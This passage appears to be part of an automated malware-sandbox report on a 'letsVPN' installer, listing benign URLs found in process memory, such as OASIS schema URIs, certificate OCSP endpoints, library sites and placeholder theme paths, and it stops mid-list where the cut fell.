              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/RenewT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT-Cancel
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Validate
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/ValidateT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancel
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelFinal
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelFinalxhttp://docs.oasis-open.org/ws-sx/w
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Issue
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/IssueT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Renew
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinal
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinalvhttp://docs.oasis-open.org/ws-sx/ws
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT-Cancel
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Validate
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateFinal
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateFinalw
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/ValidateT
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Validatevhttp://docs.oasis-open.org/ws-sx/ws-t
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinalvhttp://docs.oasis-open.org/ws-sx/w
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Renew
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Validate
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/ws-trust-1.3.xsd
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200802
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wsfed/authorization/200706
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wsfed/authorization/200706/authclaims
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wsfed/authorization/200706/claims/action
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wsfed/federation/200706
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/xx/oasis-2004xx-wss-soap-message-security-1.1#ThumbprintSHA1
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0Jurn:oasis:names:tc:SAML:1.0
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
              Source: svchost.exe, 0000000C.00000003.2146208720.000001CF4D190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: letsvpn-latest.exe, 00000013.00000003.2329176650.000000000283E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/
              Source: letsvpn-latest.exe, 00000013.00000003.2329176650.000000000283E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/Copyright
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/AppMenuDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/AppMenuDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ButtonDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ButtonDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/RadioButtonDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/RadioButtonDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ScrollViewDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ScrollViewDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TabControllerDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TabControllerDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TextBoxDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TextBoxDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/WindowDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/WindowDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.bamlx
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.bamlx
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/buttondictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/buttondictionary.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/radiobuttondictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/radiobuttondictionary.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/scrollviewdictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/scrollviewdictionary.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/tabcontrollerdictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/tabcontrollerdictionary.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/textboxdictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/textboxdictionary.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/windowdictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/windowdictionary.bamld
              Source: letsVPN.exe, 00000000.00000002.2227641461.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2037454903.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.pacific.net.sg/~jupboo
              Source: letsVPN.exe, 00000000.00000002.2227641461.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2037454903.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.pacific.net.sg/~jupboohttp://www.atomixbuttons.comhttp://web.singnet.com.sg/~rendsofthtt
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2350329188.0000000002832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlighting
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQ
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Error
              Source: LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://log.v.iask.com/n.gif?app=pcClient&type=crash&clientType=0&machineCode=
              Source: LetsPRO.exeString found in binary or memory: http://logging.apache.org/log4ne
              Source: letsvpn-latest.exe, 00000013.00000003.2515524419.000000000283C000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2776876574.0000000005882000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: http://logging.apache.org/log4net/release/faq.html#trouble-EventLog
              Source: letsvpn-latest.exe, 00000013.00000000.2210844280.000000000040A000.00000008.00000001.01000000.0000000E.sdmp, letsvpn-latest.exe, 00000013.00000003.2753842914.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000002.2829672097.000000000040A000.00000004.00000001.01000000.0000000E.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: powershell.exe, 00000018.00000002.2667384092.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2500731029.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2538895863.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
              Source: letsVPN.exe, 00000000.00000003.2153770887.00000000042F1000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2456549452.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 